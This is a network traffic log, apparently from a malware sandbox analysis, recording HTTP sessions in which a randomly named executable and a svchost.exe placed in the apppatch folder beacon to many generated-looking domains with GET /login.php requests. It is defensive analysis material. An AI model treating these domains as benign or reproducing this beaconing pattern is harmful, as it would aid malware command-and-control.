Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	63518	199.59.243.227	80	1656	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:40.854620934 CET	305	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Nov 11, 2024 18:13:41.278757095 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 17:13:40 GMT content-type: text/html; charset=utf-8 content-length: 1094 x-request-id: 193e595f-e7f5-4045-ad98-8bed19e3e289 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ== set-cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da; expires=Mon, 11 Nov 2024 17:28:41 GMT Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:13:41.278784990 CET	520	IN	Data Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmY0YTM5M2UtMWE2MS00NTQzLTkyYjItOGRkOGNhNjUzNGRhIiwicGFnZV90aW1lIjoxNzMxMzQ1MjIxLCJwYWdlX3VybCI6Imh0dHA6L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	63521	208.100.26.245	80	1656	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:40.873872042 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Nov 11, 2024 18:13:41.312769890 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:13:41 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	63522	44.221.84.105	80	1656	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:40.885122061 CET	352	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Nov 11, 2024 18:13:41.305484056 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345221\|1731345181\|20\|2\|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	63525	72.52.179.174	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:41.089545965 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	64177	72.52.179.174	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:41.619966984 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	50515	3.94.10.34	80	4180	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:44.078619003 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345217\|1731345181\|18\|2\|0
Nov 11, 2024 18:13:44.500593901 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	50518	44.221.84.105	80	4180	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:44.396770954 CET	352	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Nov 11, 2024 18:13:44.831527948 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345224\|1731345181\|21\|2\|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	50519	85.17.31.82	80	4180	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:44.401446104 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.6	50517	199.59.243.227	80	4180	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:44.414901972 CET	305	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Nov 11, 2024 18:13:44.831434011 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 17:13:44 GMT content-type: text/html; charset=utf-8 content-length: 1094 x-request-id: 7d8a22ea-671c-491e-a384-a72b1bd54b9a cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ== set-cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da; expires=Mon, 11 Nov 2024 17:28:44 GMT Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:13:44.831515074 CET	520	IN	Data Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmY0YTM5M2UtMWE2MS00NTQzLTkyYjItOGRkOGNhNjUzNGRhIiwicGFnZV90aW1lIjoxNzMxMzQ1MjI0LCJwYWdlX3VybCI6Imh0dHA6L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.6	50520	44.221.84.105	80	4180	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:44.425369978 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345217\|1731345181\|18\|2\|0
Nov 11, 2024 18:13:44.858380079 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.6	50521	23.253.46.64	80	4180	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:44.427001953 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Nov 11, 2024 18:13:44.886501074 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 11 Nov 2024 17:13:39 GMT Content-Length: 1245 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:13:44.889035940 CET	169	IN	Data Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.6	50522	208.100.26.245	80	4180	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:44.442828894 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Nov 11, 2024 18:13:44.924052000 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:13:44 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.6	50523	154.212.231.82	80	4180	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:44.488079071 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Nov 11, 2024 18:13:45.368333101 CET	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:13:45 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a 